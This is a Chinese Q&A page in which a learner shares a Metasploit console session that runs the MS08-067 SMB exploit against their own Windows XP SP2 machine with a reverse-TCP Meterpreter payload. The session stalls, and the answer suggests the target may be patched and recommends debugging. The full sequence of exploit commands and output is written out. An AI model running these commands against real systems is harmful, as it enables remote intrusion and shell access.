Skip to main content
 首页 » 编程设计

linux之回溯 5 Armitage MSF

2023年11月22日11cloudgamer

我正在学习从 Armitage 开始的 Metasploit 框架,以大致了解结构等。当我尝试运行漏洞利用程序时,我试图侵入我拥有的旧 Windowx XP sp2

msf > use exploit/windows/smb/ms08_067_netapi 
msf  exploit(ms08_067_netapi) > set LHOST 192.168.18.130 
LHOST => 192.168.18.130 
msf  exploit(ms08_067_netapi) > set RPORT 445 
RPORT => 445 
msf  exploit(ms08_067_netapi) > set LPORT 13592 
LPORT => 13592 
msf  exploit(ms08_067_netapi) > set RHOST 10.0.0.11 
RHOST => 10.0.0.11 
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp 
msf  exploit(ms08_067_netapi) > set SMBPIPE BROWSER 
SMBPIPE => BROWSER 
msf  exploit(ms08_067_netapi) > set TARGET 0 
TARGET => 0 
msf  exploit(ms08_067_netapi) > exploit -j 
[*] Exploit running as background job. 
[*] Started reverse handler on 192.168.18.130:13592 
[*] Automatically detecting the target... 
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English 
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX) 
[*] Attempting to trigger the vulnerability... 

我没有收到任何错误,但它停在那里并且没有执行漏洞利用。

请您参考如下方法:

所以看起来该漏洞利用不适用于您拥有的 Windows 版本。也许您可以尝试另一种,更简单的方法。这些漏洞是什么时候创建的?您绝对确定它们在您的 Windows 版本中未打补丁吗?

如果你想从运行其他人编写的漏洞利用脚本中学到任何东西,你必须开始调试并尝试理解脚本在做什么。在它说 Attempting to trigger the vulnerability 之后找出脚本到底在做什么,并尝试找出它可能无法工作的原因。这里有太多的可能性可以推测。